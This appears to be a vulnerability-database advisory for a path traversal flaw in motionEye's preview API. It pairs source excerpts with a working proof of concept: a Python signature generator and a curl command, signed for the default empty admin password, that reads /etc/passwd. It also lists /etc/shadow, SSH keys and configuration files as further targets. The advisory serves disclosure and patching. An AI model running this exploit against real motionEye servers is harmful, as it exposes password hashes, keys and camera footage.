PT-2026-51430 · Pypi · Motioneye
Publicado
2026-06-22
·
Atualizado
2026-06-22
·
CVE-2026-31978
CVSS v3.1
6.5
Média
| Vetor | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
Summary
motionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like
/picture/{id}/preview/{filename}. Neither the API handlers, nor the mediafiles.py functions like get media preview() check for .. sequences in the filename parameter, except get media content() which does. This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user.Details
The
get media content() function properly validates the path:python
# mediafiles.py ~line 506 — SAFE
def get media content(camera config, path, media type):
target dir = camera config['target dir']
full path = os.path.join(target dir, path)
if '..' in path: # <-- PATH TRAVERSAL CHECK PRESENT
return None
...But
get media preview() does NOT:python
# mediafiles.py ~line 910 — VULNERABLE
def get media preview(camera config, path, media type, ...):
target dir = camera config['target dir']
full path = os.path.join(target dir, path)
# <-- NO '..' CHECK
...Similarly,
del media content() at line ~865 is also missing the check. This is a classic inconsistent fix pattern.The exploit requires
%2F-encoded slashes (..%2F..%2F) which Tornado's URL router does NOT normalize — it passes the raw ../ through to os.path.join().PoC
Step 1: Authenticate as any user (normal or admin).
Step 2: Compute the request signature. motionEye uses HMAC-style signatures for API authentication. The signature is
SHA1("GET:<path>? username=<user>::<password>"). With the default empty admin password:python
#!/usr/bin/env python3
"""Signature generator for motionEye path traversal PoC"""
import hashlib, re, urllib.parse
SIGNATURE REGEX = re.compile(r'[^A-Za-z0-9/? .=&{}[]":, -]', re.DOTALL)
def compute signature(method, path, key=''):
parts = list(urllib.parse.urlsplit(path))
query = [q for q in urllib.parse.parse qsl(parts[3], keep blank values=True) if q[0] != ' signature']
query.sort(key=lambda q: q[0])
query = [(n, urllib.parse.quote(v, safe="!'()*~")) for (n, v) in query]
query = '&'.join([(q[0] + '=' + q[1]) for q in query])
parts[0] = parts[1] = ''
parts[3] = query
path = urllib.parse.urlunsplit(parts)
path = SIGNATURE REGEX.sub('-', path)
key = SIGNATURE REGEX.sub('-', key)
return hashlib.sha1(('{}:{}:{}:{}'.format(method, path, '', key)).encode('utf-8')).hexdigest().lower()
path = '/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd? username=admin'
sig = compute signature('GET', path)
print(f'Signature: {sig}')
print(f'curl --path-as-is -s "http://TARGET:8765/{path}& signature={sig}"')Step 3: Send the request using
curl --path-as-is (the --path-as-is flag is required — without it, curl normalizes ..%2F and collapses the traversal before sending):bash
# With default empty admin password, the signature is static:
curl --path-as-is -s "http://localhost:8766/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd? username=admin& signature=8b387100a519c617bdd66fe629d14b05e09c6e0c"Step 4: The server returns the contents of
/etc/passwd.Verified output:
Note on the signature value: The signature8b387100a519c617bdd66fe629d14b05e09c6e0cis valid for the default empty admin password. If the admin password has been changed, regenerate the signature using the Python script above with the correct password passed as thekeyparameter.
Impact
An authenticated user (normal or admin) can read arbitrary files from the server, including:
/etc/passwd— user enumeration/etc/motioneye/motion.conf— admin password hash, surveillance password in plaintext/etc/shadow— password hashes (if running as root, which is default in Docker)- SSH keys, environment variables, and other sensitive configuration files
- Surveillance footage from other cameras
Correção
Improper Access Control
Path traversal
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Motioneye